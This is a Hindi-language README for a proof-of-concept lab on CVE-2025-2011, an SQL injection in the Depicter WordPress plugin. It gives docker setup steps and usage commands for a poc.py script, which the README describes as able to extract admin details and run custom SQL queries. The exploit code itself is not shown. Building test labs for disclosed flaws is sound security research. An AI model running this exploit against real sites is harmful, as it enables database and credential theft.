
CVE-2025-2011 के लिए PoC - Depicter प्लगइन <= 3.6.1 में SQLi
CVE संदर्भ: CVE-2025-2011
यह रिपॉजिटरी Depicter Slider & Popup Builder प्लगइन (संस्करण < 3.6.2) में SQL इंजेक्शन भेद्यता के परीक्षण के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट वातावरण प्रदान करती है।
requests, coloramaपर्यावरण प्रारंभ करें
docker-compose up -d
WordPress इंस्टॉलेशन पूरा करें
http://localhost:5555 पर जाएँभेद्य प्लगइन स्थापित करें
chmod +x install-plugin.sh
./install-plugin.sh
यह स्क्रिप्ट निम्नलिखित कार्य करेगी:
Python निर्भरताएँ स्थापित करें
pip install requests colorama
PoC स्क्रिप्ट (poc.py) का उपयोग विभिन्न मोड में भेद्यता का परीक्षण करने के लिए किया जा सकता है:
जाँचें कि लक्ष्य भेद्य है या नहीं
python poc.py -u http://localhost:5555
एडमिन विवरण निकालें
python poc.py -u http://localhost:5555 -m admin
कस्टम SQL क्वेरी निष्पादित करें
python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
डीबग आउटपुट सक्षम करें
python poc.py -u http://localhost:5555 -d
पर्यावरण को रोकने और हटाने के लिए:
docker-compose down -v
यह पर्यावरण केवल शैक्षिक और परीक्षण उद्देश्यों के लिए प्रदान किया गया है। बिना स्पष्ट अनुमति के किसी भी सिस्टम पर इसका उपयोग न करें।